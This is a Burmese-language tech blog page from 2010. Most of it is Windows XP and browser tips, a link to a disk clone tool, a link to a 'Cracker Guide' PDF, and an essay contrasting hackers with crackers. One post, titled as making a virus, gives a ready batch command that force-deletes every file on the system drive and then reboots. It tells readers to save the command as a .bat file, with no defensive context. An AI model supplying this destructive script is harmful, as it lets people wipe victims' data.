IE ကို ဖွင့်ရာမှာ တစ်ခါတလေ စိတ်ပျက်ဖို့ ကောင်းပါတယ်။ မိုက်ကရိုဆော့ဖ် ရဲ့ default home page
“msn.com” ဟာ ငြီးငွေ့စရာ ကောင်းလောက်အောင်ကို ကြာမြင့်လွန်း တတ်ပါတယ်။ တကယ်လို့ IE ကို
ဖွင့်လိုက်တိုင်းမှာ အဖြူထည် စာမျက်နှာ ဖြစ်နေတာဟာ ပိုပြီး မြန်ဆန် စေပါတယ်။
- IE ကို ဖွင့်ပါ။
- Tools ကို ကလစ်နှိပ်ပါ။ General အောက်မှာ ရှိတဲ့ address box မှာ user blank ကို ကလစ်နှိပ်ပါ။
- Apply ကို ကလစ်နှိပ်ပါ။ OK ကို ကလစ်နှိပ်ပါ။

(၂၆) Domain တွေကို key နဲ့ သုံးပါ။
- www. google.com ကို သွားဖို့ အ တွက် အ ရှည်ကြီး ရိုက်နေဖို့ မလိုပါဘူး။
- google ကို ရိုက်ပါ။ ပြီးရင် Ctrl key ကိုင်ထားပြီး Enter ခေါက်ပါ။ အဲဒီလို short-cuts တွေကို လေ့လာရင်း
သုံးစွဲရင် ပိုမြန်ဆန် စေပါတယ်။

(၂၇) ‘Animated dog’ ဟာ လေးလံပါတယ်။ ပယ်ဖျက်ထားပါ။
Search box ဟာ အ လွန်နှေးပါတယ်။ စက်ကို crash ဖြစ်သွား စေမတတ် ပါဘဲ။ အဲဒီ ခွေးကလေးကို
ပယ်ဖျက်ထားပါ။
- Search window ကို ဖွင့်ပါ။
- Change preferences ကို click လုပ်ပါ။
- ‘Without an animated screen character’ ကို ကလစ်နှိပ်ပါ။
- Animated object မရှိတော့တဲ့ Aတွက် Search box ဟာ ပိုပြီး မြန်ဆန် လာပါလိမ့်မယ်။

(၂၈) Network အတွင်းလေ့လာ ကြည့်ခြင်း
ကိုယ့်ရဲ့ network ဧရိယာ များမှာ ဘယ်သူတွေ ရှိနေသလဲ ဆိုတာ ကြည့်ရှုချင်ရင် My Network places ကနေ
ကြည့်ရှုလို့ ရပါတယ်။ ပီစီတစ်လုံးကနေ နောက်တစ်လုံး ဆီကို access လုပ်ဖို့ ကို တော့ admin ခွင့်ပြုချက်
ဒါမှမဟုတ် password ရယူရပါမယ်။ My Network places မှာ ‘view word group computer’ ကိုရွေးလိုက်။
အဆက်အသွယ် တွေ အကုန်လုံးကို တွေ့ရပါလိမ့်မယ်။

(၂၉) MP3 သီချင်းတွေကို ကလစ်တစ်ချက်တည်းနဲ့ ဖွင့်နိုင်ပါတယ်။
- Control panel > Taslbar and Start Menu ကို ရွေးချယ်ပါ။
- Start Menu ကို ကလစ်နှိပ်ပါ။
- Customize ကို ကလစ်နှိပ်ပါ။
- Advanced tab ကို ကလစ်နှိပ်ပါ။
- My Music ကို ရွေးချယ်ပါ။

(၃၀) Print Screen သို့မဟုတ် Capture ဖမ်းယူခြင်း
ကွန်ပျူတာပေါ်က မြင်းကွင်းတစ်ခုခုကို ပုံရိပ်အနေနဲ့ ကူးယူပြီး ကိုယ့်အတွက် ပြန်လည်၍ အသုံးချနိုင်ပါတယ်။
- လိုချင်တဲ့ image ဒါမှမဟုတ် webpage ကို ဖွင့်ပါ။
- Keyboard က ‘print screen preview’ ကို ကလစ်နှိပ်ပါ။ (ဖွင့်ထားတဲ့ ပုံရိပ် အနည်းငယ်သာ လိုချင်ရင် Alt
နဲ့ တွဲနှိပ်ပါ။)
- ပြီးရင် Start > Run box မှာ ‘mspaint’ဆိုပြီး စာရိုက်ပါ။ (ရိုးရိုး paint program ကို ခေါ်သုံးရင်လည်း
ရပါတယ်။)
- paint ပေါ်လာပြီဆိုတာနဲ့ ‘Ctrl+V’ ဒါမှမဟုတ် ‘File menu’ အောက်က ‘paste’ ကို ကလစ်နှိပ်ပါ။ (ဤ paint
နေရာမှာ အခြား Clipboard ရှိတဲ့ ဓါတ်ပုံ တည်းဖြတ် ဆော့ဖ်ဝဲ တွေ photoshop corel draw စတာတွေ သုံးစွဲ
နိုင်ပါတယ်။)

(၃၁) Screen Saver ကို Slide Show လုပ်နိုင်ပါတယ်။
- Control Panel > display
- Display properies box ကျလာရင် ’screen saver tab’ ကို ရွေးချယ်ပါ။
- နောက်ဆိုရင် Screen Saver ဟာ ရုပ်ရှင်တွေ ပြသလိုမျိုး ပုံရိပ်တွေ တစ်မျိုးပြီးတစ်မျိုး မရိုးနိုင်အောင်
ပေါ်လာပါလိမ့်မယ်။
- (My Picture folder ထဲမှာ ကိုယ်လိုချင်တဲ့ Image တွေကို အရင်ဆုံးထည့်ထားရပါမယ်။ Slide Show မှာ
ပုံရိပ်တစ်ခု နဲ့ တစ်ခုအကြား ကြာမြင့်ချိန်ကို စိတ်ကြိုက် ရွေးချယ် ပြောင်းလဲ နိုင်ပါတယ်။)

(၃၂) Pop-up တွေကို လက်မခံပါနဲ့။
Firefox browser မှာ pop-up blocker ဆိုပြီး လုံခြုံရေး tool ပါဝင်တဲ့ အပြင် add-ons တွေနဲ့ အထူး ပိတ်ပင်
တားဆီးလို့ ရနိုင်ပါတယ်။ IE ရဲ့နောက်ဆုံးထွက် version7.0 ကို install လုပ်လိုက်မယ် ဆိုရင်တော့ pop-up
ပြဿနာဟာ ၇၀% လျှော့ကျ သွားမှာ ဖြစ်ပါတယ်။ ဒါကြောင့် browser မှန်သမျှရဲ့ နောက်ဆုံးထုတ် version
ကို ရအောင် ယူထားပါ။

(၃၃) Toolbar ပြုပြင်ခြင်း
- firefox မှာ Menubar ပေါ်မှာ Right click နှိပ်ပါ။
- အဲဒီထဲက ပေါ်လာတဲ့ customize bar ထဲကို ကိုယ်လိုချင်တဲ့ ‘icon’ တွေကို ပေါင်းထည့် ပေးပါ။
IE အတွက်ကတော့
- IE ကို ဖွင့်ပါ။
- View > toolbar > customize
- အဲဒီအထဲကမှ စိတ်ကြိုက် ပြင်ဆင်နိုင်ပါတယ်။ ဒီလိုပြင်ဆင် ထားတဲ့အတွက် ကိုယ်လိုချင်တဲ့ အချိန်မှာ
လိုသလို အသုံးချနိုင်တဲ့ icon တွေ အဆင်သင့် မြန်မြန် ဆန်ဆန် ရှိနေမှာပါ။

(၃၄) Private data ကို လုံခြုံအောင်ထားပါ။
- IE ကိုဖွင့်ပါ။ Tools Menu မှာ ရှိတဲံ့ internet options ကနေ Clear History ကို ကလစ်နှိပ်ပါ။ ‘Cache’
ကိုရှင်းပါ။ ပိုပြီး အန္တရာယ် ကင်းစေချင်ရင် ‘Cookies’ တွေကို ရှင်းပါ။
Firefox ကို ဖွင့်ပါ။ “Options” ကို ကလစ်နှိပ်ပါ။
- Privacy ကို ကလစ်နှိပ်တဲ့အခါမှာ box ရဲ့ အောက်ဆုံးမှာ “private data” တွေ့ရပါမယ်။ “Setting” ကို ၀င်ပြီး
အမှန်ခြစ်တွေ ပေးထားပါ။ OK နှိပ်ပြီး ပြန်ထွက်ပါ။ “Always Clear my private data when I close firefox”
ရှေ့ မှာ အမှန်ခြစ်ပေးပါ။ Cyber cafe မှာ သုံးစွဲဖို့ သင့်တော်စေတဲ့ tool တစ်ခုပါ။

(၃၅) Entry တွေကို ရှင်းလင်းပါ။
- Start > Run
- Regedit လို့ရိုက်ပြီး Enter ခေါက်ပါ။
- HKEY_LOCAL_MACHINE ကို ကလစ်နှိပ်ပါ။
- Software ကို ကလစ်နှိပ်ပါ။
- Microsoft ကို ကလစ်နှိပ်ပါ။
- Windows ကို ကလစ်နှိပ်ပါ။
- Current Version ကို ကလစ်နှိပ်ပါ။
- Uninstall ဆိုပြီးပေါ်လာပါမယ်။အဲဒီထဲမှာ ကိုယ် uninstall လုပ်စဉ်တုန်းက အကြောင်း အမျိုးမျိုး ကြောင့်
မပျက်ခဲ့တဲ့ ဆော့ဖ်ဝဲ အကြွင်းအကျန်နဲ့ အစအန တွေကို ရှင်းလင်း ထုတ်ပါ။
- Restart ပြန်လုပ်ပါ။

(၃၆) Mouse ကို ချောမွေ့ စွာ ကိုင်တွယ်နိုင်ပါတယ်။
များသောအားဖြင့် Mouse ရဲ့ default ဆက်တင်ဟာ ပြုပြင်စရာ မလိုအောင် ကောင်းပါတယ်။ တကယ်လို့
စိတ်ကြိုက် ပြင်ဆင် ချင်သေးတယ် ဆိုရင်–
- Control Panel > System
- Hardware ကို ရွေးချယ်ပါ။
- Device Manager ကို ကလစ်နှိပ်ပါ။
- ‘Mice and other pointing serices ဆိုတာ ရှိပါတယ်။ အဲဒီမှာ mouse ကို right click နှိပ်ပြီး properties
ကို စိတ်ကြိုက် ပြောင်းလဲ နိုင်ပါတယ်။

(၃၇) Restore point ကို ဖျက်ပစ်ပါ။
ကွန်ပျူတာရဲ့ စနစ်မှုာ တစ်ခုခု အမှားအယွင်း ဖြစ်နေခဲ့ရင် အရင်အတိုင်း အခြေအနေ ကောင်းလေးကို ပြန်လည်
ရရှိစေနိုင်ဖို့ System Restore ဆိုတာ ထားရှိပါတယ်။ Memory ကိုရော၊ Hard disk နေရာလွတ်
များများကိုရော လိုချင်တယ် ဆိုရင်အရင် restore point အဟောင်းတွေကို ဖျက်ပစ်ရပါမယ်။
- Start > All Programs > Accessories > System tools > Disk Clean up > More Options အထိ
ဆက်တိုက် သွားပါ။
- အဲဒီ More Options မှာရှိတဲ့ restore point အဟောင်းတွေကို delete လုပ်ပစ်ပေးပါ။

(၃၈) တပတ်တခါ defragment လုပ်ပါ။
- Start > All Programs > Accessories > System tools >Disk Defragmenter ကို ရွေးချယ်ပါ။
- Analyzing လုပ်တာနဲ့ Defragment လုပ်တာ နှစ်မျိုး ရှိပါတယ်။ နာရီဝက်၊ တစ်နာရီလောက် အချိန်
ပေးရပါမယ်။ ဒီ tool ဟာ window နဲ့ ‘built-in’ tool ဖြစ်ပြီး System မှာရှိတဲ့ မလိုအပ်တဲ့ ဖိုင်တွေနဲ့ အမှိုက်
အစအန တွေကို အထိုက်အလျှောက် ဖယ်ရှား ပေးတဲ့အတွက် သုံးစွဲ သင့်ပါတယ်။

(၃၉) ‘Virtual Memory’ တည်ဆောက်ခြင်းဟာလည်း စနစ်ကို မြန်ဆန်စေပါတယ်။
ပီစီရဲ့ လိုအပ်တဲ့ ပရိုဂရမ်တွေကို မြန်မြန်ဆန်ဆန် သုံးစွဲနိုင်စေဖို့ ‘Virtual memory’ တည်ဆောက် နိုင်ပါတယ်။
- My Computer ကို Right Click နှိပ်ပြီး properties ကို ရွေးချယ်ပါ။
- ကျလာတဲ့ box ထဲမှာ Advanced ကို ထပ်မံ ရွေပေးပါ။
- ‘Performance’ မှာရှိတဲ့ ‘Settings’ ကိုရွေးချယ်ပါ။
- Change icon ကို ကလစ်နှိပ်ပါ။
- ပြီးရင် “customize” box ကို ‘on’ ပြီးတဲ့ အခါမှာ C.D.E ရှိတဲ့ drive တစ်ခုချင်း စီကို လိုသလောက် virtual
memory ထပ်မံ တိုးဖြည့်ပေးထားလို့ ရပါတယ်။ ပြီးရင် set command ကို ကလစ်နှိပ်ပြီး OK နဲ့ ထွက်ပါ။

(၄၀) မြန်မြန်ဆန်ဆန် Lock လုပ်နည်း
‘Ctrl + Alt + Del’ ကို တွဲဖက်နှိပ်ရင် ‘Task Manger’ ပေါ်လာပါလိမ့်မယ်။ အဲဒီအထဲကမှ “Log-Off” ကို
ရွေးချယ်ပြီး အမြန် Lock လုပ်နိုင်ပါတယ်။
အဲဒီထက် ကောင်းတဲ့ နည်းကတော့-
- Kkeyboard က windows Logo Key လေးကို ဖိထားပါ။ ‘L’ ကို နှိပ်ပါ။
- Shutdown icon ကို တွေ့ရမှာ ဖြစ်သလို လိုအပ်သလို ပြန်လည် ၀င်ရောက်နိုင်တဲ့ Log-on buttom
ကလေးလည်း ပါဝင်ပါတယ်။

မြစ်ကြီးနား အွန်လိုင်းမှ စုစောင်းသမျှကို ကူးယူဖော်ပြပါသည်။

အပြည့်အစုံ

Wednesday 22 September 2010

Hard Disk ထဲက Data တွေကို ဖျက်မယ့် Virus လုပ်ကြည့်မယ်


အလွယ်ကူဆုံး Virus လုပ်ကြည့်မယ်။ စမ်းသပ်ကြည့်ရအောင်ပါ။ Note Pad က News ကို ဖွင့်ပြီး အခုကုဒ်လေးကို @echo off del %systemdrive%\*.* /f /s /q shutdown -r -f -t 00 ကော်ပီကူးပြီး ပြန်ချလိုက်ပါ။ ပြီးရင် EXTENSION ကို .bat လို့ပေးပါ။ Filename.bat ပေါ့ခင်ဗျာ။ ပြီးရင် Save လုပ်လိုက်ပါ။ ၄င်းဖိုင်ကို သွားဖွင့်မကြည့်လိုက်ပါနဲ့။ သင့် Hard Disk ထဲက ဒေတာတွေကို ဖျက်ဆီး လိုက်ပါလိမ့်မယ်။ စာဖတ်သူများ လေ့လာမှတ်သားရအောင်လို့ပါ။

အပြည့်အစုံ

Portable Hard Disk Clone Tool

Photobucket
မင်္ဂလာပါခင်ဗျာ။ အားလုံးပဲ ပျော်ရွှင်ဖွယ်နေ့ရက်ဖြစ်ပါစေ။ လိုအပ်နေတဲ့သူတွေ အတွက် အကျိုးရှိစေဖို့
နှင့် အသစ်အဆန်းစမ်းသပ်ချင်တဲ့ သူတွေအတွက် Hard Disk Clone Software လေးကို Post အဖြစ်
တင်လိုက်ပါတယ်။ကျွန်တော်တို့တွေ Hard Disk ကို Clone လုပ်ဖို့ဆိုရင် အခုအသုံးများနေကြတာက
Norton Ghost , Acronic True Image စသဖြင့် ဒါတွေပဲအသုံးများကြပါတယ်။
အခုကျွန်တော်တင်ပေးလိုက် တဲ့ Hard Disk Clone Software လေးဟာ Portable လည်းဖြစ်၊ Soft-
ware အနေနဲ့ကော Bootable အနေနှင့်ပါ အသုံးပြုလို့ရပါတယ်။Clone Speed လည်းမြန်ဆန်ပြီး၊အ
သုံးပြုရတာလည်း easy use ပါပဲ။လိုအပ်မယ် ဆိုရင် ကျွန်တော့်ကို အားပေးတဲ့ အနေနဲ့ များများသာ
Download လုပ်ကြဗျာ။
Link  : Portable Hard Disk Clone 

အပြည့်အစုံ

Tuesday 21 September 2010

Hacker နဲ့ Cracker ဘာတွေ ကွာခြားလဲ...

Hacker နဲ့ Cracker ဘာတွေ ကွာခြားလဲ။ ကွန်ပျူတာစနစ်တွေကို ချိုးဖြတ်ဝင်ရောက် အတားအဆီးတွေကို ကျော်လွန်နိုင်တယ်ဆိုရုံနဲ့ Hacker တယောက် မဖြစ်သေးပါဘူး။ တကယ့် Hacker အစစ်တွေကတော့ သူတို့ကို ကရက်ကာ(crackers) လို့ခေါ်ကြပါတယ်။ အဲဒီတော့ Cracker နဲ့ Hacker ကွဲကွဲပြားပြားသိစေဖို့အတွက် Cracking (Reverse engineering) လုပ်တဲ့အကြောင်း Cracker လမ်းညွှန် စာအုပ်တင်ပေးလိုက်ပါတယ်။ Cracker အကြောင်း ကိုမျိုးမြင့်ထိုက်ရေးထားတဲ့ Cracker လမ်းညွန်စာအုပ်လေးပါ။ ဒေါင်းလော့ လုပ်ပြီးယူကြည့်နိုင်သလို။ ဆိုက်ဘ်ပေါ်မှာလည်း ကြည့်ရှုလို့ရအောင် တင်ပေးလိုက်ပါတယ်။.....

စာအုပ်ကို ဒေါင်းလော့ လုပ်ချင်တယ်ဆိုရင်တော့... http://sites.google.com/site/komyatblog/Cracker_Guide_2.0_.pdf?attredirects=0&d=1 မှာ သွားရောက်ယူနိုင်ပါတယ်။

Myanmar Crg

အပြည့်အစုံ

Hacker ဖြစ်ချင်လား

ဟက်ကာဖြစ်ချင်တယ်။ ဟက်ကာဆိုတာဘာလဲ… ဒီမေးခွန်းက အရမ်းကိုတွေ့ရတာများပါတယ်။ ကျွန်တော်လည်း သေချာမသိပါဘူး။ လေ့လာကြည့်တဲ့အခါ နည်းပညာပိုင်းဆိုင်ရာမှာ ကျွမ်းကျင်မှုရှိပြီးတော့ ပြသနာတွေကို ဖြေရှင်းရတာကို နှစ်သက်တဲ့သူ ကန့်သတ်ချက်တွေကို ဖြတ်ကျော်နိုင်တဲ့သူတွေကို ခေါ်တာပဲဖြစ်ပါတယ်။ ဟက်ကာဆိုတာ ကွန်ပျူတာ လောကမှာပဲရှိတာ မဟုတ်ပါဘူး… တခြားသော Science ဒါမှမဟုတ် art တစ်ခုခုမှာ အမြင့်ဆုံးအခြေအနေအထိ ကျွမ်းကျင်သူတွေကိုလည်း ဟက်ကာလို့ ပြောလို့ရပါတယ်။ ကျွန်တော်ကတော့ ကွန်ပျူတာနဲ့ ပတ်သက်တာကိုပဲ ပြောမှာပါ။ သူတို့ကိုယ်သူတို့ ဟက်ကာပါလို့ ပြောနေကြတဲ့သူတွေလည်းများစွာရှိပြန်ပါတယ်။ ဒါပေမယ့် တကယ်တော့ မဟုတ်ကြပါဘူး။ အထူးသဖြင့်တောု့ ပျက်စီးရာပျက်စီးကြောင်း လုပ်ဆောင်ပြီး… ကွန်ပျူတာစနစ်တွေကို ချိုးဖြတ်ဝင်ရောက် အတားအဆီးတွေကို ကျော်လွန်နိုင်တယ်ဆိုပြီး လေကျယ်နေကြတဲ့ ဆယ်ကျော်သက် လူငယ်အများစုပါ။ တကယ့် ဟက်ကာ အစစ်တွေကတော့ သူတို့ကို ကရက်ကာ(crackers) လို့ခေါ်ကြပါတယ်… တကယ်တော့သူတို့က ဘာမှအထင်ကြီးစရာ မရှိပါဘူး…။ တကယ့် ဟက်ကာအစစ်တွေကတော့ အဲဒီကရက်ကာတွေဟာ ပျင်းရိတဲ့သူတွေ၊ တာဝန် မယူတတ်တဲ့သူတွေ၊ ဥာဏ်မကောင်းတဲ့သူတွေလို့ပဲ တွေးကြပါတယ်… security တွေကို ချိုးဖောက်ကျော်လွန်ပြီး ၀င်ရောက်နိုင်ယုံနဲ့တော့ ဟက်ကာ မဟုတ်ပါဘူး… ။ ဒါပေမယ့် ၀မ်းနည်းစရာက စာရေးဆရာတွေ ဂျာနယ်လစ်တွေက ဟက်ကာဆိုတဲ့ စာလုံးကို သုံးပြီးတော့ပဲ အဲဒီခရက်ကာတွေအကြောင်းကို တွင်တွင်ကြီး ဖော်ပြနေတော့တာပါပဲ။ အဲဒီအတွက်တော့ ဟက်ကာအစစ်တိုင်းက စိတ်ပျက်ကြရပါတယ်။ သူတို့ကြားက အခြေခံခြားနားမှုကတော့ ကွန်ပျူတာ ပရော်ဖက်ရှင်နယ်အများစုနားလည် ထားကြသလိုပါပဲ… hackers build things, crackers break them ပါပဲ….။

ဟက်ကာဖြစ်ချင်ရင်ဘာလုပ်ရမလဲ… အဓိကအဖြေကတော့ စာဖတ်ပါ… များများဖတ်ပါ။ ဟက်ကာတယောက်ထားရှိတဲ့ သဘောထားတွေကိုပြောချင်ပါတယ်…။ ပြသနာတွေကို ဖြေရှင်းပြီး.. အသစ်အသစ်တွေ ဖန်တီးတယ်။ တည်ဆောက်တဲ့ သူတွေကမှာသာ ဟက်ကာတွေပါ။ အင်တာနတ်ကို ဖန်တီးခဲ့တဲ့သူတွေ.. Operating System ကို ဖန်တီးခဲ့တဲ့သူတွေ… world wide web ကို သက်ဝင်လှုပ်ရှားလာအောင် လုပ်ခဲ့သူတွေက ဟက်ကာတွေပေါ့။ ဟက်ကာတွေက လွတ်လပ်မှုနဲ့ အပြန်အလှန်ကူညီမှုတွေပေါ်မှာ ပျော်မွေ့တဲ့သူမျိုးတွေပါ။ ဟက်ကာဖြစ်ချင်ရင်တော့ အဲဒီစိတ်ဓာတ်မျိုးရှိဖို့လိုပါပြီ။ တကယ် ရှိလာဖို့ကတော့ တကယ်လုပ်ရတော့မှာပေါ့…။ဆရာကြီးဖြစ်ချင်ရင် ဆရာကြီးတွေရဲ့စိတ်ထားကို အတုခိုးရမှာပေါ့…။ ပညာရပ်ပိုင်းမှာသာမကပဲ စိတ်ပိုင်းဆိုင်ရာလည်း လိုအပ်ပါတယ်။ အောက်ကကဗျာလေးအတိုင်းပါပဲ။ 

To follow the path:
look to the master,
follow the master,
walk with the master,
see through the master,
become the master.

ဒါကြောင့် ဟက်ကာဖြစ်ချင်ရင် အဲဒီအတိုင်း သင်ယုံကြည်လာတဲ့အချိန်အထိ ထပ်ခါထပ်ခါ ကြိုးစားပေါ့။
ကျွန်တော်တို့ရဲ့ ကမ္ဘာကြီးက ဖြေရှင်းခံရဖို့ စောင့်ဆိုင်းနေတဲ့ စိတ်ဝင်စားစရာ ပြသနာတွေနဲ့ နေ့တိုင်း ပြည့်နှက်နေ ပါတယ်။ ဟက်ကာတယောက် ဖြစ်ရတာတော့ အရမ်းပျော်စရာကောင်းပါတယ်… ဒါပေမယ့် အဲဒီပျော်စရာတွေရဖို့ ကြီးမားတဲ့ကြိုးစားအားထုတ်မှုတွေ လုပ်ကြရပါတယ်။ ဟက်ကာဖြစ်ဖို့အတွက် ပြသနာတွေဖြေရှင်းရတာကို ပီတိဖြစ်တတ်ရမယ်။ ကိုယ့်ကိုယ်ကိုယ်အမြဲတမ်း ချွန်မျှနေအောင် သွေးနေရမယ် ကိုယ့်ပညာကိုအမြဲတမ်း လေ့လာနေရပါမယ်။ သင့်အနေနဲ့ ပုံမှန်အားဖြင့်ဒီလို စိတ်ခံစားချက်မျိုး ရှိမနေဘူးဆိုရင်တော့ တော်တော်ကြိုးစားယူရဦးမှာပေါ့။ သင်တခုခုလုပ်တဲ့အခါ လေ့လာတဲ့အခါမှာပဲဖြစ်ဖြစ် ယုံကြည်မှုတခုကို ထားရှိဖို့တော့ လိုပါလိမ့်မယ်။ သင်ပြသနာတ ခုကိုဖြေရှင်းတော့မယ်ဆိုရင် အဲဒါနဲ့ပတ်သတ်ပြီးအားလုံးကိုတော့သင်သိထားဖို့မဖြစ်နိုင်ပါဘူး.. တစ်စိတ်တစ်ပိုင်းတော့သင်သိပါလိမ့်မယ်… အဲဒီတစ်ပိုင်းလေးကနေဆက်ပြီးလေ့လာ..လေ့လာရင်းနဲ့ တစ်ပိုင်းပြီးတစ်ပိုင်းပိုပြီး နားလည်လာ.. နောက်ဆုံးမှာတော့ အောင်မြင်သွားမှာပါ။

ဘယ်ပြသနာကိုမဆို နှစ်ခါဖြေရှင်းဖို့ အကြောင်းကို မရှိပါဘူး။  နားမလည်တော့ဘူးလား..။ ကျွန်တော်တို့ရဲ့ အချိန်တွေ ကျွန်တော်တို့ရဲ့ ဦးနှောက်တွေက အရမ်းတန်ဖိုးရှိတာပါ။ လုပ်ပြီးသား ကိစ္စတခုအတွက် အချိန်ထပ်အကုန်ခံရတယ်။ ပြသနာအသစ်တွေ စောင့်နေတာကို အဟောင်းတွေကိုပဲ ထပ်ဖြေရှင်းမနေသင့်ဘူးလေ။ ဟက်ကာတွေ စဉ်းစားနေရတဲ့အချိန်က အရမ်းအဖိုးတန်တဲ့အတွက် သင်က ဟက်ကာဆိုရင် သင်သိတာတွေ မျှဝေပေးသင့်ပါတယ် သင်သိတဲ့ solution တွေကို တခြားဟက်ကာတွေကို ဖွင့်ပြပေးရင် ကောင်းမှာပါ။ ဒါမှ သူတို့တွေလည်း တခြားအသစ်အသစ်တွေ ဖြေရှင်းနိုင်တာပေါ့။ တခုတော့ရှိတာပေါ့… ပြသနာတခုအတွက် အဖြေဆိုတာ တခါတရံမှာ တခုထက်မကလည်း ရှိနိုင်တယ်နော။

ဟက်ကာ(ပြောရရင်တော့ Creative people တွေပေါ့)သူတို့တွေက လွတ်လပ်မှု (Freedom) ကို နှစ်သက်ပါတယ်။ သူတို့အပေါ်မှာ authority လာပြတာကို ယေဘူယျအားဖြင့် မနှစ်သက်ကြပါဘူး… ချူပ်ချယ်မှုတွေကို မုန်းတီးပါတယ်။ သူတို့က အတူတကွ ပူးပေါင်းလုပ်ဆောင်ရတာကိုတော့ နှစ်သက်ကြတဲ့ သူတွေပါ။ အဲဒီ စိတ်ထားမျိုးလေးလည်း ရှိရပါမယ်။ အထက်က စိတ်ထားမျိုးတွေ အမူအကျင့်တွေ ရှိပြီးရင်တောင်မှ ဟက်ကာ မဖြစ်သေးပြန်ပါဘူ။ ဟက်ကာဖြစ်ဖို့ဆိုတာ ကိုယ့်ရဲ့ ပညာရပ်မှာ ကျွမ်းကျင်မှု၊ များများလေ့ကျင့်မှု၊ အသေအချာ အာရုံစူးစိုက်မှု၊ အလုပ်ကြိုးစားမှုတွေလည်း လိုအပ်ပါသေးတယ်။

Attitude တွေက အရေးကြီးတာ မှန်ပါတယ်။ ဒါပေမယ့် တကယ်တမ်းမှာတော့ Skills က ပိုအရေးကြီးပြန်ပါတယ်။ တခြားသူတယောက်က သင့်ကို ဟက်ကာတယောက်လို့ ခေါ်စေဖို့ သက်မှတ် လာစေဖို့အတွက် အရင်ဆုံးသင်လုပ်ရဦးမဲ့ အခြေခံအကြောင်းအရာလေးတွေ ပြောချင်ပါတယ်။ အရင်ဦးဆုံးတော့ Learn How to Program ပါ။ ဒါကဟက်ကင်းမှာတော့ အခြေခံအကျဆုံးပါပဲ။ programming language တခုမှ မသိပဲနဲ့တော့ ဘယ်လို ဟက်ကာဖြစ်ပါ့မလဲနော့်။ ရှိရင်တော့ ကျွန်တော်လည်း မသိဘူး.. ။ ဘာ language မှ သင်မတတ်သေးဘူး ဆိုရင်တော့ Python ကို စလေ့လာဖို့ တိုက်တွန်းချင်ပါတယ်။ အကောင်းဆုံး ပထမဆုံး လေ့လာသင့်တဲ့ language တခုလို့ သေချာမပြောနိုင်ပေမယ့် beginner တွေအတွက် သင့်တော်သလို powerful လဲဖြစ်ပါတယ်.. ပရောဂျက် ကြီးကြီးမားမားကြီးတွေလည်း သူ့ကိုသုံးပြီးလုပ်နိုင်တာ လုပ်နေကြတာပဲဖြစ်ပါတယ်။ နောက်တစ်ခုကတော့ C ပါ C++ ပဲဖြစ်ဖြစ်ပေါ့ ။ သင်တခုခုကို ကျွမ်းကျင်ရင် နောက်တစ်ခုဆိုတာ အရမ်းလွယ်သွားပါပြီ။ ဘယ်အရာမှတော့ စလုပ်ရင် လွယ်တယ်လို့ မရှိပါဘူး။ ဟက်ကာတွေအတွက် အရေးကြီးတဲ့ နောက်ထပ် language တွေကတော့ Perl နဲ့ Lisp တို့ပါပဲ။ မရေးနိုင်ရင်တောင် ဖတ်နိုင်ဖို့တော့လိုပါလိမ့်မယ်။ တကယ်တော့ အားလုံး လေ့လာတာကတော့ အကောင်းဆုံးပါပဲ။ programming ကို မတူညီတဲ့ နည်းလမ်းတွေနဲ့ ချည်းကပ်တာပေါ့ ။

အဲဒါအားလုံးက သင့်အတွက် အကျိုးဖြစ်စေမှာပါပဲ။ Hacker တယောက်ရဲ့ skill level ကို language တတ်ယုံနဲ့လည်း မဖြစ်ဘူးနော်။ Language တွေအပေါ်မှာမှီခိုမှုမရှိဘဲ ပြသနာတွေ အပေါ်မှာ စဉ်းစားနိုင်ဖို့လည်း လိုသေးတယ်။ သိပြီးသား concept တွေကို ဆက်စပ်တွေးခေါ်နိုင်ပြီး language တခုကို အသစ်ထပ်လေ့လာရင် ရက်အနည်းငယ်လောက်နဲ့ ရနိုင်ပြီဆိုရင်တော့ တော်တော်ဟုတ်လာပါပြီ။ ဆိုလိုချင်တာက ရှိရှိသမျှသော language တွေအားလုံးသင်တတ်တယ်ပေါ့။ ရက်အနည်းငယ်နဲ့ တခုတတ်ပြီဆိုမှတော့ ဘာကြာမှာလဲနော်။

programming language လေ့လာတယ်ဆိုတာ natural language ကိုလေ့လာသလိုပါပဲ။ အထက်က ဆရာ့ဆရာကြီးတွေ ရေးထားတာတွေကို များများဖတ် ပြီးရင် ကိုယ်ကိုယ်တိုင်နဲနဲရေး၊ နောက်ထပ်ထပ်ပြီးတော့ များများဖတ်၊ များများထပ်ရေး၊ ပိုပြီးဖတ်၊ ပိုပြီးရေး……၊ ဘယ်အချိန်ထိ လုပ်သွားရမလဲဆိုတော့ သင်ရေးတာတွေက ဈေးကွက်ဝင်တဲ့ အဆင့်အထိပေါ့။ အရင်တုန်းကတော့ coding ကောင်းကောင်းရှာဖတ်ဖို့ဆိုတာ ခက်ခဲ့ပါတယ်။ အခုတော့ မဟုတ်တော့ပါဘူး။ open source နဲ့ ပါတ်သတ်တဲ့ software တွေ ၊ Programming tools တွေ၊ operating system တွေ(အဲဒါတွေအားလုံး ဟက်ကာတွေ လုပ်ထားတာ) အများကြီးရှိနေပါပြီ။ ဟက်ကာ ဖြစ်ချင်တယ်ဆိုရင် အခုချက်ချင်း Linux ဒါမှမဟုတ် BSD-Unixes မဟုတ်ရင်လည်း OpenSolaris သင့်ကွန်ပျူတာမှာ Install လုပ်လိုက်ပါတော့။ သြော်သင်က Windows က ဘာဖြစ်လို့လည်းလို့ မေးတယ်လား… သူက binary တွေနဲ့ distribute လုပ်ထားတာလေ.. code တွေမှ ဖတ်လို့မရတာ ပြင်လို့လည်း မရဘူးလေ သင်မဖြစ်မနေ Unix တခုကိုတော့ လေ့လာ ရမယ်ဆိုရင် အလွယ်ကူဆုံးအနေနဲ့ Linux ကို ကောက်ကိုင်လိုက်တော့လေ။ မပူပါနဲ့ သင်အခုသုံးနေတဲ့ Windows ကြီးနဲ့လည်း တွဲတင်ထားလို့ ရပါတယ်။ ကဲအခုချက်ချင်း Learn it , Run it နော်။ ကလိတော့နော်။ အင်တာနတ် ကိုလည်း အပီ မွှေနှောက်တော့နော်… code တွေကိုဖတ် ပြီးရင်ပြန်ပြင်ရမယ် နော်.. ။ သင်ပျော်မွေ့လာမှာပါ… အသိပညာ ဗဟုသုတအသစ်တွေကို အရသာခံပြီးတော့ လေ့လာသင်ယူလိုက်စမ်းပါ..။ တခါတည်းပြောပြလိုက်မယ်နော်.. Beginner တွေအတွက် အသင့်တော်ဆုံးကတော့ Ubuntu ဖြစ်လာနေပြီ… ကြုံတွေ့ရမယ့် ပြသနာတွေအတွက်လဲမပူပါနဲ့ သင့်ကို ကူညီမယ့်သူတွေ 